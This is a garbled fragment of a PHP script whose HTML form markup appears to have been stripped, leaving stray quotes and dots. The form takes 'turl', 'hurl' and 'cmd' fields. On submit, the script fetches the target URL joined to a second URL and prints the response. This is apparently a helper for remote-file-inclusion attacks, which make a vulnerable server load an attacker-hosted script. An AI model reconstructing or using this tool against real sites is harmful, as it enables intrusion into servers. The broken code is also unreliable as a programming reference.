" ."turl:

" ."hurl:

" ."cmd:

" ."" ."
"; if (!isset($_POST['submit'])) { echo $form; }else{ $file = fopen ("test.txt", "w+"); fwrite($file, ""); fclose($file); $file = fopen ($turl.$hurl, "r"); if (!$file) { echo "

Unable to get output.\n"; exit; } echo $form; while (!feof ($file)) { $line = fgets ($file, 1024); echo $line."
"; } } ?>